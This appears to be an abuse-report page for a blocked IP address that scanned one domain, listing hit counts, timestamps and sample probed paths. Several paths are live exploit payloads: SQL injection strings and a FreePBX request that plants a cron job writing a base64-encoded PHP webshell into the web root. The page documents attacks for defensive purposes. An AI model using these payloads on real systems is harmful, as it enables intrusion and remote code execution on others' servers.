abuseip.org
- Reason
- suspicious paths across 1 domains
- Hits (last hour)
- 55
- Unique targets hit
- 1
- Unique paths probed
- 730
- Detection count
- 24
- First seen
- 2026-09-09 01:08:04 UTC
- Last seen
- 2026-09-09 02:03:29 UTC
- Block expires
- 2026-09-10 02:13:05 UTC
Sample paths probed
- /wfs?service=WMS&request=GetMap
- /admin/ajax.php?module=FreePBX%5Cmodules%5Cendpoint%5Cajax&command=model&template=x&model=model&brand=x'+AND+EXTRACTVALUE(1,CONCAT('~USER:',(SELECT+USER()),'~'))+--+
- /wp-admin/admin-ajax.php?action=service_finder_switch_back
- /logon/LogonPoint/index.html
- /Providers/HtmlEditorProviders/DNNConnect.CKE/Browser/FileUploader.ashx
- /wp-content/plugins/sneeit-framework/sneeit-framework.php
- /p/u/doAuthentication.do
- /api/v1/version
- /Apriso/MessageProcessor/FlexNetMessageProcessor.svc
- /iam/governance/applicationmanagement/api/v1/applications/groovyscriptstatus
- /
- /wp-content/plugins/spirit-framework/readme.txt
- /admin/ajax.php?module=FreePBX%5Cmodules%5Cendpoint%5Cajax&command=model&template=x&model=model&brand=x'%20;INSERT%20INTO%20cron_jobs%20(modulename,jobname,command,class,schedule,max_runtime,enabled,execution_order)%20VALUES%20('sysadmin','xifhjw','echo%20%22PD9waHAgaGVhZGVyKCd4X3BvYzogQ1ZFLTIwMjUtNTc4MTknKTsgZWNobyBzaGVsbF9leGVjKCd1bmFtZSAtYScpOyB1bmxpbmsoX19GSUxFX18pOyA/Pgo=%22%7Cbase64%20-d%20%3E/var/www/html/hwsyo.php',NULL,'*%20*%20*%20*%20*',30,1,1)%20--%20
- /ReportingWebService/ReportingWebService.asmx
- /geoserver/wfs?service=WMS&request=GetMap
- /login.php
- /goform/SetIPTVCfg
- /student.php?action=delete&id=1%27+AND+EXTRACTVALUE(0x0a,CONCAT(0x0a,VERSION(),0x0a))--+-
- /cgi/login
- /wp-content/plugins/sneeit-framework/readme.txt
Sample User-Agents
- RootEvidence/1.0
What does this mean?
This address sent traffic that the redirs.com edge classified as automated abuse โ typically WordPress/PHP exploit scanning, credential file probing (.env, .git, .aws/), or mass-domain enumeration. The block is automatic and time-limited (24 hours from last detection).
If you believe this is a false positive, contact [email protected] with the IP and the timestamps above.